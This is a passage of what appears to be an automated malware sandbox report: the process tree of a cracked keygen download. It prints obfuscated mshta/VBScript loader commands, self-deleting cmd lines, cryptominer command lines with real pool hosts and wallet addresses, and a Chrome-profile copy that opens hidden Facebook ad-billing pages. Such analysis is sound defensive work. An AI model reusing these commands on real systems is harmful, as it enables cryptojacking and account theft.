                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                                                                                                                4⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Loads dropped DLL
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                PID:2644
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                                  5⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:2616
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                              keygen-step-1.exe
                                                                                                                              3⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:2496
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe
                                                                                                                              keygen-step-5.exe
                                                                                                                              3⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:3036
                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                "C:\Windows\System32\mshta.exe" VbscriPt: CLoSe ( CrEatEObjeCT("WsCrIPt.Shell" ). Run( "cMD.exe /C TyPe ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" > Ehmj.exe && StArT Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~ & if """"== """" for %J IN ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" ) do taskkill -IM ""%~NxJ"" -F > NuL " ,0 ))
                                                                                                                                4⤵
                                                                                                                                  PID:852
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /C TyPe "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" >Ehmj.exe && StArT Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~ & if ""== "" for %J IN ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill -IM "%~NxJ" -F > NuL
                                                                                                                                    5⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:2952
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Ehmj.exe
                                                                                                                                      Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:1296
                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                        "C:\Windows\System32\mshta.exe" VbscriPt: CLoSe ( CrEatEObjeCT("WsCrIPt.Shell" ). Run( "cMD.exe /C TyPe ""C:\Users\Admin\AppData\Local\Temp\Ehmj.exe"" > Ehmj.exe && StArT Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~ & if ""-P85DVJ_N_WA39dHAGmL0E~ ""== """" for %J IN ( ""C:\Users\Admin\AppData\Local\Temp\Ehmj.exe"" ) do taskkill -IM ""%~NxJ"" -F > NuL " ,0 ))
                                                                                                                                        7⤵
                                                                                                                                          PID:2620
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /C TyPe "C:\Users\Admin\AppData\Local\Temp\Ehmj.exe" >Ehmj.exe && StArT Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~ & if "-P85DVJ_N_WA39dHAGmL0E~ "== "" for %J IN ( "C:\Users\Admin\AppData\Local\Temp\Ehmj.exe" ) do taskkill -IM "%~NxJ" -F > NuL
                                                                                                                                            8⤵
                                                                                                                                              PID:3008
                                                                                                                                          • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                            "C:\Windows\System32\regsvr32.exe" /U -s .\YFDBQ.T
                                                                                                                                            7⤵
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                            PID:2640
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          taskkill -IM "keygen-step-5.exe" -F
                                                                                                                                          6⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:2764
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                    keygen-step-2.exe
                                                                                                                                    3⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:2988
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\C54C.tmp.exe
                                                                                                                                      "C:\Users\Admin\AppData\Roaming\C54C.tmp.exe"
                                                                                                                                      4⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:1600
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\C54C.tmp.exe"
                                                                                                                                        5⤵
                                                                                                                                          PID:2100
                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                            timeout /T 10 /NOBREAK
                                                                                                                                            6⤵
                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                            PID:1684
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                                                                                                                        4⤵
                                                                                                                                          PID:2840
                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                            ping 127.0.0.1
                                                                                                                                            5⤵
                                                                                                                                            • Runs ping.exe
                                                                                                                                            PID:2748
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                                                                                                        keygen-step-3.exe
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:2884
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                                                                                                                          4⤵
                                                                                                                                            PID:1820
                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                              ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                              5⤵
                                                                                                                                              • Runs ping.exe
                                                                                                                                              PID:1892
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                                                                                                          keygen-step-4.exe
                                                                                                                                          3⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          PID:1612
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\asdw.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\asdw.exe"
                                                                                                                                            4⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                            PID:2208
                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                              "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                              5⤵
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              • Modifies registry class
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:2964
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                            4⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                            • Modifies system certificate store
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            PID:328
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\CE13.tmp.exe
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\CE13.tmp.exe"
                                                                                                                                              5⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                              PID:2148
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\CE13.tmp.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\CE13.tmp.exe"
                                                                                                                                                6⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Checks processor information in registry
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                PID:2164
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\D064.tmp.exe
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\D064.tmp.exe"
                                                                                                                                              5⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Adds Run key to start application
                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                              • Modifies system certificate store
                                                                                                                                              PID:3016
                                                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                                                -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w12998 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                6⤵
                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                PID:1688
                                                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                                                -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w24381@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                6⤵
                                                                                                                                                  PID:1704
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp2_Phatnoise.Music.Manager.all.ve.crack.zip\Phatnoise.Music.Manager.all.ve.crack.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Temp2_Phatnoise.Music.Manager.all.ve.crack.zip\Phatnoise.Music.Manager.all.ve.crack.exe"
                                                                                                                                        1⤵
                                                                                                                                          PID:2044
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen.bat" "
                                                                                                                                            2⤵
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            PID:820
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-pr.exe
                                                                                                                                              keygen-pr.exe -p83fsase3Ge
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              PID:2976
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX3\key.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX3\key.exe"
                                                                                                                                                4⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                PID:2636
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX3\key.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\RarSFX3\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                                                  5⤵
                                                                                                                                                    PID:1560
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-1.exe
                                                                                                                                                keygen-step-1.exe
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:2524
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-5.exe
                                                                                                                                                keygen-step-5.exe
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:1788
                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                  "C:\Windows\System32\mshta.exe" VbscriPt: CLoSe ( CrEatEObjeCT("WsCrIPt.Shell" ). Run( "cMD.exe /C TyPe ""C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-5.exe"" > Ehmj.exe && StArT Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~ & if """"== """" for %J IN ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-5.exe"" ) do taskkill -IM ""%~NxJ"" -F > NuL " ,0 ))
                                                                                                                                                  4⤵
                                                                                                                                                    PID:2840
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C TyPe "C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-5.exe" >Ehmj.exe && StArT Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~ & if ""== "" for %J IN ( "C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-5.exe" ) do taskkill -IM "%~NxJ" -F > NuL
                                                                                                                                                      5⤵
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      PID:2300
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Ehmj.exe
                                                                                                                                                        Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~
                                                                                                                                                        6⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:1604
                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                          "C:\Windows\System32\mshta.exe" VbscriPt: CLoSe ( CrEatEObjeCT("WsCrIPt.Shell" ). Run( "cMD.exe /C TyPe ""C:\Users\Admin\AppData\Local\Temp\Ehmj.exe"" > Ehmj.exe && StArT Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~ & if ""-P85DVJ_N_WA39dHAGmL0E~ ""== """" for %J IN ( ""C:\Users\Admin\AppData\Local\Temp\Ehmj.exe"" ) do taskkill -IM ""%~NxJ"" -F > NuL " ,0 ))
                                                                                                                                                          7⤵
                                                                                                                                                            PID:1136
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C TyPe "C:\Users\Admin\AppData\Local\Temp\Ehmj.exe" >Ehmj.exe && StArT Ehmj.exe -P85DVJ_N_WA39dHAGmL0E~ & if "-P85DVJ_N_WA39dHAGmL0E~ "== "" for %J IN ( "C:\Users\Admin\AppData\Local\Temp\Ehmj.exe" ) do taskkill -IM "%~NxJ" -F > NuL
                                                                                                                                                              8⤵
                                                                                                                                                                PID:1704
                                                                                                                                                            • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                              "C:\Windows\System32\regsvr32.exe" /U -s .\YFDBQ.T
                                                                                                                                                              7⤵
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                                              PID:2204
                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                            taskkill -IM "keygen-step-5.exe" -F
                                                                                                                                                            6⤵
                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                            PID:2632
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-2.exe
                                                                                                                                                      keygen-step-2.exe
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:2744
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\24B2.tmp.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\24B2.tmp.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:2144
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\24B2.tmp.exe"
                                                                                                                                                          5⤵
                                                                                                                                                            PID:1092
                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                              timeout /T 10 /NOBREAK
                                                                                                                                                              6⤵
                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                              PID:1968
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-2.exe" >> NUL
                                                                                                                                                          4⤵
                                                                                                                                                            PID:2852
                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                              ping 127.0.0.1
                                                                                                                                                              5⤵
                                                                                                                                                              • Runs ping.exe
                                                                                                                                                              PID:1184
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-3.exe
                                                                                                                                                          keygen-step-3.exe
                                                                                                                                                          3⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:2860
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-3.exe"
                                                                                                                                                            4⤵
                                                                                                                                                              PID:2192
                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                5⤵
                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                PID:1084
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-4.exe
                                                                                                                                                            keygen-step-4.exe
                                                                                                                                                            3⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            PID:2560
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX4\asdw.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX4\asdw.exe"
                                                                                                                                                              4⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                              PID:308
                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                                                5⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                • Modifies registry class
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                PID:2212
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"
                                                                                                                                                              4⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:588
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\2E24.tmp.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\2E24.tmp.exe"
                                                                                                                                                                5⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                PID:2668
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\2E24.tmp.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\2E24.tmp.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                  PID:2672
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\3546.tmp.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\3546.tmp.exe"
                                                                                                                                                                5⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                PID:1104
                                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                                  -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w13298 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                  PID:2884
                                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                                  -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w30195@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:2736
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Drops Chrome extension
                                                                                                                                                                PID:1516
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:2804
                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                      taskkill /f /im chrome.exe
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                      PID:3044
                                                                                                                                                                  • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                    xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                    PID:2808
                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                    PID:1600
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef7784f50,0x7fef7784f60,0x7fef7784f70
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:2300
                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1040,2347697410078701443,8893525883505944409,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1064 /prefetch:2
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:1220
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1040,2347697410078701443,8893525883505944409,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1424 /prefetch:8
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:1680
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1040,2347697410078701443,8893525883505944409,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1800 /prefetch:1
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:2368
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1040,2347697410078701443,8893525883505944409,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1808 /prefetch:1
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:2872
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1040,2347697410078701443,8893525883505944409,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1912 /prefetch:1
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:964
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1040,2347697410078701443,8893525883505944409,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2032 /prefetch:1
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:1424
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1040,2347697410078701443,8893525883505944409,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2292 /prefetch:8
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:1256
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1040,2347697410078701443,8893525883505944409,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2560 /prefetch:1
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:1084
                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1040,2347697410078701443,8893525883505944409,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2200 /prefetch:1
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:2736
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1040,2347697410078701443,8893525883505944409,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:1
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:1436
                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1040,2347697410078701443,8893525883505944409,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3576 /prefetch:2
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:2672
